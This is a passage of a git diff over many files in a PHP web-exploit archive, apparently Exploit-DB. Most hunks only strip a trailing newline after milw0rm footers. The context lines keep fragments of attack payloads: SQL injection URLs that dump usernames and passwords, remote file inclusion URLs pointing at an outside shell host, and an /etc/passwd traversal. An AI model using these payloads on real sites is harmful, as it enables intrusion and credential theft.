b/platforms/php/webapps/5743.txt @@ -18,4 +18,4 @@ ---------------------------------------------------------------------------- [*] Greetings : Str0ke, all friends & muslims HaCkeRs... -# milw0rm.com [2008-06-05] +# milw0rm.com [2008-06-05] \ No newline at end of file diff --git a/platforms/php/webapps/5744.txt b/platforms/php/webapps/5744.txt index d5dba5923..0cee18693 100755 --- a/platforms/php/webapps/5744.txt +++ b/platforms/php/webapps/5744.txt @@ -18,4 +18,4 @@ Vulnerable versions are Power Phlogger <= 2.2.5. ############################################################ -# milw0rm.com [2008-06-05] +# milw0rm.com [2008-06-05] \ No newline at end of file diff --git a/platforms/php/webapps/5745.txt b/platforms/php/webapps/5745.txt index 2c1f0cf6d..15fb2bc40 100755 --- a/platforms/php/webapps/5745.txt +++ b/platforms/php/webapps/5745.txt @@ -54,4 +54,4 @@ ####################### ####################### -# milw0rm.com [2008-06-05] +# milw0rm.com [2008-06-05] \ No newline at end of file diff --git a/platforms/php/webapps/5748.txt b/platforms/php/webapps/5748.txt index d1ecd5b50..e2852f5e0 100755 --- a/platforms/php/webapps/5748.txt +++ b/platforms/php/webapps/5748.txt @@ -18,4 +18,4 @@ ---------------------------------------------------------------------------- [*] Greetings : Str0ke, all friends & muslims HaCkeRs... -# milw0rm.com [2008-06-05] +# milw0rm.com [2008-06-05] \ No newline at end of file diff --git a/platforms/php/webapps/5752.pl b/platforms/php/webapps/5752.pl index b7d4cd19b..d19062d1f 100755 --- a/platforms/php/webapps/5752.pl +++ b/platforms/php/webapps/5752.pl @@ -11,4 +11,4 @@ [*] Example : http://localhost/[Joomla_Path]/index.php?option=com_gameq&task=page&category_id=-1 UNION SELECT 1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14 FROM jos_users-- -# milw0rm.com [2008-06-07] +# milw0rm.com [2008-06-07] \ No newline at end of file diff --git a/platforms/php/webapps/5754.txt b/platforms/php/webapps/5754.txt index bcea6334c..27ff24043 100755 --- a/platforms/php/webapps/5754.txt +++ b/platforms/php/webapps/5754.txt @@ -71,4 +71,4 @@ Pragma: no-cache # Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos # ################################################################## -# milw0rm.com [2008-06-08] +# milw0rm.com [2008-06-08] \ No newline at end of file diff --git a/platforms/php/webapps/5755.pl b/platforms/php/webapps/5755.pl index 9702012ae..986587a99 100755 --- a/platforms/php/webapps/5755.pl +++ b/platforms/php/webapps/5755.pl @@ -108,4 +108,4 @@ sub istrue2 } -# milw0rm.com [2008-06-08] +# milw0rm.com [2008-06-08] \ No newline at end of file diff --git a/platforms/php/webapps/5756.txt b/platforms/php/webapps/5756.txt index 49e3fc985..9a09d5f9f 100755 --- a/platforms/php/webapps/5756.txt +++ b/platforms/php/webapps/5756.txt @@ -23,4 +23,4 @@ MM MMM MMM MMMMMMMMM MMMMMMMMMM MMM NMM MMM MMM MMM MMM MMM [*] Greetings : Alex, Adeel, CeBbZ, Cubacola, Noel ... -# milw0rm.com [2008-06-08] +# milw0rm.com [2008-06-08] \ No newline at end of file diff --git a/platforms/php/webapps/5757.txt b/platforms/php/webapps/5757.txt index 646baebfa..794ddb4fa 100755 --- a/platforms/php/webapps/5757.txt +++ b/platforms/php/webapps/5757.txt @@ -16,4 +16,4 @@ www.site.com/browser_crm/pub/clients.php?bcrm_pub_root=http://www.gwebspace.de/m Author: ahmadbady | kivi_hacker666@yahoo.com -# milw0rm.com [2008-06-08] +# milw0rm.com [2008-06-08] \ No newline at end of file diff --git a/platforms/php/webapps/5758.txt b/platforms/php/webapps/5758.txt index b37193856..1800dc5be 100755 --- a/platforms/php/webapps/5758.txt +++ b/platforms/php/webapps/5758.txt @@ -128,4 +128,4 @@ sub inject_log return $socket->send($header); } -# milw0rm.com [2008-06-08] +# milw0rm.com [2008-06-08] \ No newline at end of file diff --git a/platforms/php/webapps/5759.txt b/platforms/php/webapps/5759.txt index 1548efb59..f7857726e 100755 --- a/platforms/php/webapps/5759.txt +++ b/platforms/php/webapps/5759.txt @@ -18,4 +18,4 @@ [*] Greetings : Str0ke, all friends & muslims HaCkeRs... [*] Greetings2: http://palcastle.org/cc -# milw0rm.com [2008-06-08] +# milw0rm.com [2008-06-08] \ No newline at end of file diff --git a/platforms/php/webapps/5760.pl b/platforms/php/webapps/5760.pl index 40362cfbf..a0133ed95 100755 --- a/platforms/php/webapps/5760.pl +++ b/platforms/php/webapps/5760.pl @@ -71,4 +71,4 @@ else{print "\n[-] Exploit Failed...\n";} #------------------- Exploit exploited by Stack --------------------# ######################################## -# milw0rm.com [2008-06-09] +# milw0rm.com [2008-06-09] \ No newline at end of file diff --git a/platforms/php/webapps/5761.pl b/platforms/php/webapps/5761.pl index 5bd532439..61e2f698c 100755 --- a/platforms/php/webapps/5761.pl +++ b/platforms/php/webapps/5761.pl @@ -76,4 +76,4 @@ print "+**********************************************************************+\ exit(); } -# milw0rm.com [2008-06-09] +# milw0rm.com [2008-06-09] \ No newline at end of file diff --git a/platforms/php/webapps/5762.txt b/platforms/php/webapps/5762.txt index fc7cad67e..c57dbf3ef 100755 --- a/platforms/php/webapps/5762.txt +++ b/platforms/php/webapps/5762.txt @@ -16,4 +16,4 @@ Greats to all arabians haxors :d D-S.Morocco Is The Best :d Waiting -# milw0rm.com [2008-06-09] +# milw0rm.com [2008-06-09] \ No newline at end of file diff --git a/platforms/php/webapps/5764.txt b/platforms/php/webapps/5764.txt index 1e38b0363..f3c15121b 100755 --- a/platforms/php/webapps/5764.txt +++ b/platforms/php/webapps/5764.txt @@ -67,4 +67,4 @@ http://[target]/[path]/edit1.php?action= # Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos # ################################################################## -# milw0rm.com [2008-06-09] +# milw0rm.com [2008-06-09] \ No newline at end of file diff --git a/platforms/php/webapps/5766.txt b/platforms/php/webapps/5766.txt index bcbac1822..14c283997 100755 --- a/platforms/php/webapps/5766.txt +++ b/platforms/php/webapps/5766.txt @@ -72,4 +72,4 @@ Contact: admin[4t}bugreport{d0t]ir WwW.BugReport.ir WwW.AmnPardaz.com -# milw0rm.com [2008-06-09] +# milw0rm.com [2008-06-09] \ No newline at end of file diff --git a/platforms/php/webapps/5767.php b/platforms/php/webapps/5767.php index a97ef3dc8..bdd8f12ce 100755 --- a/platforms/php/webapps/5767.php +++ b/platforms/php/webapps/5767.php @@ -149,4 +149,4 @@ http_send($host, $packet); ?> -# milw0rm.com [2008-06-09] +# milw0rm.com [2008-06-09] \ No newline at end of file diff --git a/platforms/php/webapps/5768.txt b/platforms/php/webapps/5768.txt index ed3f4ba99..783161262 100755 --- a/platforms/php/webapps/5768.txt +++ b/platforms/php/webapps/5768.txt @@ -10,4 +10,4 @@ http://localhost/index.php?shownews=2'+UNION+SELECT+1,2,username,4,pwd,6,7,8,9,1 Greatz : aLL My Friends :P -# milw0rm.com [2008-06-09] +# milw0rm.com [2008-06-09] \ No newline at end of file diff --git a/platforms/php/webapps/5769.pl b/platforms/php/webapps/5769.pl index 8dab809b0..1d5b110fb 100755 --- a/platforms/php/webapps/5769.pl +++ b/platforms/php/webapps/5769.pl @@ -47,4 +47,4 @@ if ($answer =~ /Contact(.*?)
/){ #------------------- Exploit exploited by Stack --------------------# ######################################## -# milw0rm.com [2008-06-09] +# milw0rm.com [2008-06-09] \ No newline at end of file diff --git a/platforms/php/webapps/5770.php b/platforms/php/webapps/5770.php index 8af7f549d..bb597d2e2 100755 --- a/platforms/php/webapps/5770.php +++ b/platforms/php/webapps/5770.php @@ -122,4 +122,4 @@ while(1) ?> -# milw0rm.com [2008-06-09] +# milw0rm.com [2008-06-09] \ No newline at end of file diff --git a/platforms/php/webapps/5771.txt b/platforms/php/webapps/5771.txt index e5c507140..d71a5efa8 100755 --- a/platforms/php/webapps/5771.txt +++ b/platforms/php/webapps/5771.txt @@ -41,4 +41,4 @@ ______ !! This is just for educational purposes, DO NOT use for illegal. !! -# milw0rm.com [2008-06-10] +# milw0rm.com [2008-06-10] \ No newline at end of file diff --git a/platforms/php/webapps/5772.txt b/platforms/php/webapps/5772.txt index 257b99da8..93644b250 100755 --- a/platforms/php/webapps/5772.txt +++ b/platforms/php/webapps/5772.txt @@ -40,4 +40,4 @@ ______ !! This is just for educational purposes, DO NOT use for illegal. !! -# milw0rm.com [2008-06-10] +# milw0rm.com [2008-06-10] \ No newline at end of file diff --git a/platforms/php/webapps/5773.txt b/platforms/php/webapps/5773.txt index ea26225c7..760584ddc 100755 --- a/platforms/php/webapps/5773.txt +++ b/platforms/php/webapps/5773.txt @@ -72,4 +72,4 @@ ______ !! This is just for educational purposes, DO NOT use for illegal. !! -# milw0rm.com [2008-06-10] +# milw0rm.com [2008-06-10] \ No newline at end of file diff --git a/platforms/php/webapps/5774.txt b/platforms/php/webapps/5774.txt index ce7a8a07a..382130165 100755 --- a/platforms/php/webapps/5774.txt +++ b/platforms/php/webapps/5774.txt @@ -44,4 +44,4 @@ ______ !! This is just for educational purposes, DO NOT use for illegal. !! -# milw0rm.com [2008-06-10] +# milw0rm.com [2008-06-10] \ No newline at end of file diff --git a/platforms/php/webapps/5776.txt b/platforms/php/webapps/5776.txt index 500a561c5..d187effd7 100755 --- a/platforms/php/webapps/5776.txt +++ b/platforms/php/webapps/5776.txt @@ -52,4 +52,4 @@ http://[Target]/[experts_path]/answer.php?question_id=41 AND 1=2 UNION SELECT co # Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos # ################################################################## -# milw0rm.com [2008-06-10] +# milw0rm.com [2008-06-10] \ No newline at end of file diff --git a/platforms/php/webapps/5779.txt b/platforms/php/webapps/5779.txt index e57137aec..e74c11c71 100755 --- a/platforms/php/webapps/5779.txt +++ b/platforms/php/webapps/5779.txt @@ -74,4 +74,4 @@ http://[target]/[path]/index.php?page=1§ion="> update: see: http://www.syndeocms.org/forum/index.php?topic=1788.0 -# milw0rm.com [2008-06-10] +# milw0rm.com [2008-06-10] \ No newline at end of file diff --git a/platforms/php/webapps/5782.txt b/platforms/php/webapps/5782.txt index caa415893..6230d157b 100755 --- a/platforms/php/webapps/5782.txt +++ b/platforms/php/webapps/5782.txt @@ -49,4 +49,4 @@ http://localhost/tntforum/index.php?modulo=../../../../../../../../etc/passwd%00 # Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos # ################################################################## -# milw0rm.com [2008-06-10] +# milw0rm.com [2008-06-10] \ No newline at end of file diff --git a/platforms/php/webapps/5783.txt b/platforms/php/webapps/5783.txt index 370d157fb..deb7a0406 100755 --- a/platforms/php/webapps/5783.txt +++ b/platforms/php/webapps/5783.txt @@ -34,4 +34,4 @@ echo $huseyin[0]; author : Dj Remix -# milw0rm.com [2008-06-10] +# milw0rm.com [2008-06-10] \ No newline at end of file diff --git a/platforms/php/webapps/5784.txt b/platforms/php/webapps/5784.txt index a667c30f0..558f58858 100755 --- a/platforms/php/webapps/5784.txt +++ b/platforms/php/webapps/5784.txt @@ -64,4 +64,4 @@ Note: This exploit will open boot.ini in system file: # Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos # ################################################################## -# milw0rm.com [2008-06-11] +# milw0rm.com [2008-06-11] \ No newline at end of file diff --git a/platforms/php/webapps/5785.txt b/platforms/php/webapps/5785.txt index 0b0aa7e18..6986e76c7 100755 --- a/platforms/php/webapps/5785.txt +++ b/platforms/php/webapps/5785.txt @@ -45,4 +45,4 @@ ###################################################################################################### ###################################################################################################### -# milw0rm.com [2008-06-11] +# milw0rm.com [2008-06-11] \ No newline at end of file diff --git a/platforms/php/webapps/5786.txt b/platforms/php/webapps/5786.txt index dd6c9fe58..b2c4f733e 100755 --- a/platforms/php/webapps/5786.txt +++ b/platforms/php/webapps/5786.txt @@ -73,4 +73,4 @@ with Administrative's Privilege. # Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos # ################################################################## -# milw0rm.com [2008-06-11] +# milw0rm.com [2008-06-11] \ No newline at end of file diff --git a/platforms/php/webapps/5787.txt b/platforms/php/webapps/5787.txt index 033cd9ff5..c16442992 100755 --- a/platforms/php/webapps/5787.txt +++ b/platforms/php/webapps/5787.txt @@ -57,4 +57,4 @@ POC Exploit: ./sqlmap.py -p "entry_id" -a "./txt/user-agents.txt" -D "mycrocms" # Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos # ################################################################## -# milw0rm.com [2008-06-11] +# milw0rm.com [2008-06-11] \ No newline at end of file diff --git a/platforms/php/webapps/5788.txt b/platforms/php/webapps/5788.txt index 0ad8470fe..868265869 100755 --- a/platforms/php/webapps/5788.txt +++ b/platforms/php/webapps/5788.txt @@ -64,4 +64,4 @@ Contact: admin[4t}bugreport{d0t]ir WwW.BugReport.ir WwW.AmnPardaz.com -# milw0rm.com [2008-06-11] +# milw0rm.com [2008-06-11] \ No newline at end of file diff --git a/platforms/php/webapps/5789.pl b/platforms/php/webapps/5789.pl index bb4c9b2ce..80778dccf 100755 --- a/platforms/php/webapps/5789.pl +++ b/platforms/php/webapps/5789.pl @@ -164,4 +164,4 @@ sub usage() } -# milw0rm.com [2008-06-11] +# milw0rm.com [2008-06-11] \ No newline at end of file diff --git a/platforms/php/webapps/5791.txt b/platforms/php/webapps/5791.txt index 51006e8b2..9818d3e7b 100755 --- a/platforms/php/webapps/5791.txt +++ b/platforms/php/webapps/5791.txt @@ -63,4 +63,4 @@ DOWNLOAD : http://downloads.sourceforge.net/gbx # Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos # ################################################################## -# milw0rm.com [2008-06-12] +# milw0rm.com [2008-06-12] \ No newline at end of file diff --git a/platforms/php/webapps/5792.txt b/platforms/php/webapps/5792.txt index 7570556fd..265c71440 100755 --- a/platforms/php/webapps/5792.txt +++ b/platforms/php/webapps/5792.txt @@ -64,4 +64,4 @@ SITE : www.citec.us # Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos # ################################################################## -# milw0rm.com [2008-06-12] +# milw0rm.com [2008-06-12] \ No newline at end of file diff --git a/platforms/php/webapps/5794.pl b/platforms/php/webapps/5794.pl index eb6ece4ba..244bbc2d2 100755 --- a/platforms/php/webapps/5794.pl +++ b/platforms/php/webapps/5794.pl @@ -100,4 +100,4 @@ sub usage() } #eof -# milw0rm.com [2008-06-12] +# milw0rm.com [2008-06-12] \ No newline at end of file diff --git a/platforms/php/webapps/5796.php b/platforms/php/webapps/5796.php index 51294d5c6..ae77dc6e9 100755 --- a/platforms/php/webapps/5796.php +++ b/platforms/php/webapps/5796.php @@ -157,4 +157,4 @@ break; } ?> -# milw0rm.com [2008-06-12] +# milw0rm.com [2008-06-12] \ No newline at end of file diff --git a/platforms/php/webapps/5797.txt b/platforms/php/webapps/5797.txt index 2e0599d33..15d2b4f6d 100755 --- a/platforms/php/webapps/5797.txt +++ b/platforms/php/webapps/5797.txt @@ -69,4 +69,4 @@ DOWNLOAD : www.butterflymedia.ro/downloads/organizer_2_0_0.zip # Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos # ################################################################## -# milw0rm.com [2008-06-13] +# milw0rm.com [2008-06-13] \ No newline at end of file diff --git a/platforms/php/webapps/5798.pl b/platforms/php/webapps/5798.pl index 5511e118e..ab17c4cf6 100755 --- a/platforms/php/webapps/5798.pl +++ b/platforms/php/webapps/5798.pl @@ -102,4 +102,4 @@ else print "Exploit Failed !!!\n"; } -# milw0rm.com [2008-06-13] +# milw0rm.com [2008-06-13] \ No newline at end of file diff --git a/platforms/php/webapps/5799.pl b/platforms/php/webapps/5799.pl index 608a88fe4..1947929a9 100755 --- a/platforms/php/webapps/5799.pl +++ b/platforms/php/webapps/5799.pl @@ -60,4 +60,4 @@ else{print "\n[-] Exploit Failed...\n"; # codec by Houssamix From H-T Team -# milw0rm.com [2008-06-13] +# milw0rm.com [2008-06-13] \ No newline at end of file diff --git a/platforms/php/webapps/5800.pl b/platforms/php/webapps/5800.pl index 31ebb5b12..332432365 100755 --- a/platforms/php/webapps/5800.pl +++ b/platforms/php/webapps/5800.pl @@ -34,4 +34,4 @@ if ($answer =~ /$cat/) #------------------- Exploit exploited by Stack --------------------# ######################################## -# milw0rm.com [2008-06-13] +# milw0rm.com [2008-06-13] \ No newline at end of file diff --git a/platforms/php/webapps/5801.txt b/platforms/php/webapps/5801.txt index 7829c1038..6ba731589 100755 --- a/platforms/php/webapps/5801.txt +++ b/platforms/php/webapps/5801.txt @@ -22,4 +22,4 @@ http://www.easy-clanpage.de/?section=downloads&show=viewdownload&id=24 #my friend's Tr0n,N1ReeXz and all the others ################################################################################### -# milw0rm.com [2008-06-13] +# milw0rm.com [2008-06-13] \ No newline at end of file diff --git a/platforms/php/webapps/5802.txt b/platforms/php/webapps/5802.txt index 0442631ff..a12701041 100755 --- a/platforms/php/webapps/5802.txt +++ b/platforms/php/webapps/5802.txt @@ -28,4 +28,4 @@ http://site.com/lista_anexos.php?tsk_id=-1/**/union/**/select/**/1,concat(NOM,0x ------- young iranian h4ck3rz -# milw0rm.com [2008-06-13] +# milw0rm.com [2008-06-13] \ No newline at end of file diff --git a/platforms/php/webapps/5803.txt b/platforms/php/webapps/5803.txt index 2be673c8f..a2cb58950 100755 --- a/platforms/php/webapps/5803.txt +++ b/platforms/php/webapps/5803.txt @@ -85,4 +85,4 @@ Contact: -------------------------------- [ EOF ] ---------------------------------- -# milw0rm.com [2008-06-13] +# milw0rm.com [2008-06-13] \ No newline at end of file diff --git a/platforms/php/webapps/5804.txt b/platforms/php/webapps/5804.txt index acf4fdd95..04eb5ed9c 100755 --- a/platforms/php/webapps/5804.txt +++ b/platforms/php/webapps/5804.txt @@ -85,4 +85,4 @@ Contact: -------------------------------- [ EOF ] ---------------------------------- -# milw0rm.com [2008-06-13] +# milw0rm.com [2008-06-13] \ No newline at end of file diff --git a/platforms/php/webapps/5806.pl b/platforms/php/webapps/5806.pl index 88b9dfc3b..639e30ef1 100755 --- a/platforms/php/webapps/5806.pl +++ b/platforms/php/webapps/5806.pl @@ -146,4 +146,4 @@ sub usage() } -# milw0rm.com [2008-06-13] +# milw0rm.com [2008-06-13] \ No newline at end of file diff --git a/platforms/php/webapps/5807.txt b/platforms/php/webapps/5807.txt index cbaf16f81..64058ebff 100755 --- a/platforms/php/webapps/5807.txt +++ b/platforms/php/webapps/5807.txt @@ -29,4 +29,4 @@ --==+====================================================================================+==-- [+] [The End] -# milw0rm.com [2008-06-13] +# milw0rm.com [2008-06-13] \ No newline at end of file diff --git a/platforms/php/webapps/5808.txt b/platforms/php/webapps/5808.txt index af8fa5b1b..a77d21cd7 100755 --- a/platforms/php/webapps/5808.txt +++ b/platforms/php/webapps/5808.txt @@ -33,4 +33,4 @@ http://[host]/[path]/includes/Cache/Lite/Output.php?mosConfig_absolute_path=http://shell? -# milw0rm.com [2008-06-13] +# milw0rm.com [2008-06-13] \ No newline at end of file diff --git a/platforms/php/webapps/5809.txt b/platforms/php/webapps/5809.txt index 02682eff8..bcfa25a50 100755 --- a/platforms/php/webapps/5809.txt +++ b/platforms/php/webapps/5809.txt @@ -29,4 +29,4 @@ --==+====================================================================================+==-- [+] [The End] -# milw0rm.com [2008-06-14] +# milw0rm.com [2008-06-14] \ No newline at end of file diff --git a/platforms/php/webapps/5810.txt b/platforms/php/webapps/5810.txt index 22c41004b..f1022dc1d 100755 --- a/platforms/php/webapps/5810.txt +++ b/platforms/php/webapps/5810.txt @@ -64,4 +64,4 @@ Also In Different Variable In "Belang" Also "username" By POST method # bEST wISHES -# milw0rm.com [2008-06-14] +# milw0rm.com [2008-06-14] \ No newline at end of file diff --git a/platforms/php/webapps/5811.txt b/platforms/php/webapps/5811.txt index 14b3a6203..26779aed8 100755 --- a/platforms/php/webapps/5811.txt +++ b/platforms/php/webapps/5811.txt @@ -48,4 +48,4 @@ DOWNLOAD : http://downloads.sourceforge.net/fam-connections # Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos # ################################################################## -# milw0rm.com [2008-06-14] +# milw0rm.com [2008-06-14] \ No newline at end of file diff --git a/platforms/php/webapps/5812.txt b/platforms/php/webapps/5812.txt index 6a63b42fb..c1ff110cb 100755 --- a/platforms/php/webapps/5812.txt +++ b/platforms/php/webapps/5812.txt @@ -32,4 +32,4 @@ ####################### ####################### -# milw0rm.com [2008-06-14] +# milw0rm.com [2008-06-14] \ No newline at end of file diff --git a/platforms/php/webapps/5813.txt b/platforms/php/webapps/5813.txt index 44342a721..16c4c42e0 100755 --- a/platforms/php/webapps/5813.txt +++ b/platforms/php/webapps/5813.txt @@ -60,4 +60,4 @@ SITE : www.citec.us # Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos # ################################################################## -# milw0rm.com [2008-06-14] +# milw0rm.com [2008-06-14] \ No newline at end of file diff --git a/platforms/php/webapps/5815.pl b/platforms/php/webapps/5815.pl index e73b061e2..6fbf78d84 100755 --- a/platforms/php/webapps/5815.pl +++ b/platforms/php/webapps/5815.pl @@ -139,4 +139,4 @@ sub usage() } -# milw0rm.com [2008-06-14] +# milw0rm.com [2008-06-14] \ No newline at end of file diff --git a/platforms/php/webapps/5816.pl b/platforms/php/webapps/5816.pl index 3c309c80b..cd8f3f851 100755 --- a/platforms/php/webapps/5816.pl +++ b/platforms/php/webapps/5816.pl @@ -109,4 +109,4 @@ sub istrue2 } } -# milw0rm.com [2008-06-14] +# milw0rm.com [2008-06-14] \ No newline at end of file diff --git a/platforms/php/webapps/5818.txt b/platforms/php/webapps/5818.txt index 35d90706d..778def1ad 100755 --- a/platforms/php/webapps/5818.txt +++ b/platforms/php/webapps/5818.txt @@ -52,4 +52,4 @@ -[*]+ xeCMS <= 1.0.0 RC2 Insecure Cookie Handling Vulnerability +[*]- -[*]+================================================================================+[*]- -# milw0rm.com [2008-06-14] +# milw0rm.com [2008-06-14] \ No newline at end of file diff --git a/platforms/php/webapps/5819.txt b/platforms/php/webapps/5819.txt index e7d0575e9..a55b62ddb 100755 --- a/platforms/php/webapps/5819.txt +++ b/platforms/php/webapps/5819.txt @@ -67,4 +67,4 @@ -[*]+ EZCMS <= 1.2 Multiple Remote Vulnerabilitys +[*]- -[*]+================================================================================+[*]- -# milw0rm.com [2008-06-14] +# milw0rm.com [2008-06-14] \ No newline at end of file diff --git a/platforms/php/webapps/5820.txt b/platforms/php/webapps/5820.txt index 5d9195b9b..60b934dbe 100755 --- a/platforms/php/webapps/5820.txt +++ b/platforms/php/webapps/5820.txt @@ -55,4 +55,4 @@ -[*]+ PHPEasyNews <= 1.13 RC2 SQL Injection Vulnerabilitys +[*]- -[*]+================================================================================+[*]- -# milw0rm.com [2008-06-14] +# milw0rm.com [2008-06-14] \ No newline at end of file diff --git a/platforms/php/webapps/5821.txt b/platforms/php/webapps/5821.txt index 0bf11b2bd..bc112be58 100755 --- a/platforms/php/webapps/5821.txt +++ b/platforms/php/webapps/5821.txt @@ -53,4 +53,4 @@ -[*]+ AlstraSoft AskMe Pro <= 2.1 SQL Injection Vulnerabilitys +[*]- -[*]+================================================================================+[*]- -# milw0rm.com [2008-06-14] +# milw0rm.com [2008-06-14] \ No newline at end of file diff --git a/platforms/php/webapps/5822.txt b/platforms/php/webapps/5822.txt index 321b13bb6..d4c3beea6 100755 --- a/platforms/php/webapps/5822.txt +++ b/platforms/php/webapps/5822.txt @@ -82,4 +82,4 @@ For Linux: # Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos # ################################################################## -# milw0rm.com [2008-06-15] +# milw0rm.com [2008-06-15] \ No newline at end of file diff --git a/platforms/php/webapps/5823.txt b/platforms/php/webapps/5823.txt index 6e423f35a..93854e979 100755 --- a/platforms/php/webapps/5823.txt +++ b/platforms/php/webapps/5823.txt @@ -54,4 +54,4 @@ ###################################################################################################### ###################################################################################################### -# milw0rm.com [2008-06-15] +# milw0rm.com [2008-06-15] \ No newline at end of file diff --git a/platforms/php/webapps/5824.txt b/platforms/php/webapps/5824.txt index ab3600055..e9bb7c363 100755 --- a/platforms/php/webapps/5824.txt +++ b/platforms/php/webapps/5824.txt @@ -73,4 +73,4 @@ with Administrative's Privilege. # Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos # ################################################################## -# milw0rm.com [2008-06-15] +# milw0rm.com [2008-06-15] \ No newline at end of file diff --git a/platforms/php/webapps/5826.py b/platforms/php/webapps/5826.py index 73bbd0d71..fe43a1185 100755 --- a/platforms/php/webapps/5826.py +++ b/platforms/php/webapps/5826.py @@ -178,4 +178,4 @@ class killsmf: killsmf() -# milw0rm.com [2008-06-15] +# milw0rm.com [2008-06-15] \ No newline at end of file diff --git a/platforms/php/webapps/5828.txt b/platforms/php/webapps/5828.txt index f3863612e..64c2639b6 100755 --- a/platforms/php/webapps/5828.txt +++ b/platforms/php/webapps/5828.txt @@ -31,4 +31,4 @@ ####################### ####################### -# milw0rm.com [2008-06-15] +# milw0rm.com [2008-06-15] \ No newline at end of file diff --git a/platforms/php/webapps/5829.txt b/platforms/php/webapps/5829.txt index b8505dfb9..72a760874 100755 --- a/platforms/php/webapps/5829.txt +++ b/platforms/php/webapps/5829.txt @@ -31,4 +31,4 @@ now you can access to action.php whit admin access and manage the cms ;) ------- young iranian h4ck3rz -# milw0rm.com [2008-06-15] +# milw0rm.com [2008-06-15] \ No newline at end of file diff --git a/platforms/php/webapps/5830.txt b/platforms/php/webapps/5830.txt index 58a18352e..33c8a0203 100755 --- a/platforms/php/webapps/5830.txt +++ b/platforms/php/webapps/5830.txt @@ -63,4 +63,4 @@ ###################################################################################################### -# milw0rm.com [2008-06-16] +# milw0rm.com [2008-06-16] \ No newline at end of file diff --git a/platforms/php/webapps/5831.txt b/platforms/php/webapps/5831.txt index 1886892ed..56de3a5e5 100755 --- a/platforms/php/webapps/5831.txt +++ b/platforms/php/webapps/5831.txt @@ -68,4 +68,4 @@ Digital Security is leading IT security company in Russia, providing information Contact: research [at] dsec [dot] ru http://www.dsec.ru (in Russian) -# milw0rm.com [2008-06-16] +# milw0rm.com [2008-06-16] \ No newline at end of file diff --git a/platforms/php/webapps/5832.pl b/platforms/php/webapps/5832.pl index 5baaae22d..d76aa5cbd 100755 --- a/platforms/php/webapps/5832.pl +++ b/platforms/php/webapps/5832.pl @@ -146,4 +146,4 @@ sub usage() } -# milw0rm.com [2008-06-16] +# milw0rm.com [2008-06-16] \ No newline at end of file diff --git a/platforms/php/webapps/5833.txt b/platforms/php/webapps/5833.txt index 33250eccf..5557077e7 100755 --- a/platforms/php/webapps/5833.txt +++ b/platforms/php/webapps/5833.txt @@ -25,4 +25,4 @@ side note: same vulnerability listed here: http://milw0rm.com/exploits/5743 but this was sent in back in 02/2008, must of missed it. Original author: eXeCuTeR. -# milw0rm.com [2008-06-16] +# milw0rm.com [2008-06-16] \ No newline at end of file diff --git a/platforms/php/webapps/5834.pl b/platforms/php/webapps/5834.pl index 76b152daa..ddcd107df 100755 --- a/platforms/php/webapps/5834.pl +++ b/platforms/php/webapps/5834.pl @@ -107,4 +107,4 @@ sub istrue2 } } -# milw0rm.com [2008-06-17] +# milw0rm.com [2008-06-17] \ No newline at end of file diff --git a/platforms/php/webapps/5835.txt b/platforms/php/webapps/5835.txt index 597745e18..3759e4f92 100755 --- a/platforms/php/webapps/5835.txt +++ b/platforms/php/webapps/5835.txt @@ -46,4 +46,4 @@ ###################################################################################################### ###################################################################################################### -# milw0rm.com [2008-06-17] +# milw0rm.com [2008-06-17] \ No newline at end of file diff --git a/platforms/php/webapps/5836.txt b/platforms/php/webapps/5836.txt index 61e785a3c..284a3b3a5 100755 --- a/platforms/php/webapps/5836.txt +++ b/platforms/php/webapps/5836.txt @@ -44,4 +44,4 @@ ####################################################################################################### ####################################################################################################### -# milw0rm.com [2008-06-17] +# milw0rm.com [2008-06-17] \ No newline at end of file diff --git a/platforms/php/webapps/5838.txt b/platforms/php/webapps/5838.txt index 9752e8f09..0e72020ce 100755 --- a/platforms/php/webapps/5838.txt +++ b/platforms/php/webapps/5838.txt @@ -46,4 +46,4 @@ ####################################################################################################### ####################################################################################################### -# milw0rm.com [2008-06-17] +# milw0rm.com [2008-06-17] \ No newline at end of file diff --git a/platforms/php/webapps/5839.txt b/platforms/php/webapps/5839.txt index 924f55bfd..2d52e83c8 100755 --- a/platforms/php/webapps/5839.txt +++ b/platforms/php/webapps/5839.txt @@ -27,4 +27,4 @@ -=-=-=-= SuNHouSe2@yahoo.com =-=-=- -# milw0rm.com [2008-06-17] +# milw0rm.com [2008-06-17] \ No newline at end of file diff --git a/platforms/php/webapps/5840.txt b/platforms/php/webapps/5840.txt index 0f6de7219..daacce3db 100755 --- a/platforms/php/webapps/5840.txt +++ b/platforms/php/webapps/5840.txt @@ -33,4 +33,4 @@ ####################### ####################### -# milw0rm.com [2008-06-17] +# milw0rm.com [2008-06-17] \ No newline at end of file diff --git a/platforms/php/webapps/5841.txt b/platforms/php/webapps/5841.txt index ec56bab8c..baa5cc8e8 100755 --- a/platforms/php/webapps/5841.txt +++ b/platforms/php/webapps/5841.txt @@ -56,4 +56,4 @@ SITE : www.citec.us # Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos # ################################################################## -# milw0rm.com [2008-06-17] +# milw0rm.com [2008-06-17] \ No newline at end of file diff --git a/platforms/php/webapps/5842.txt b/platforms/php/webapps/5842.txt index c633214b2..4463a2ec2 100755 --- a/platforms/php/webapps/5842.txt +++ b/platforms/php/webapps/5842.txt @@ -53,4 +53,4 @@ ###################################################################################################### ###################################################################################################### -# milw0rm.com [2008-06-17] +# milw0rm.com 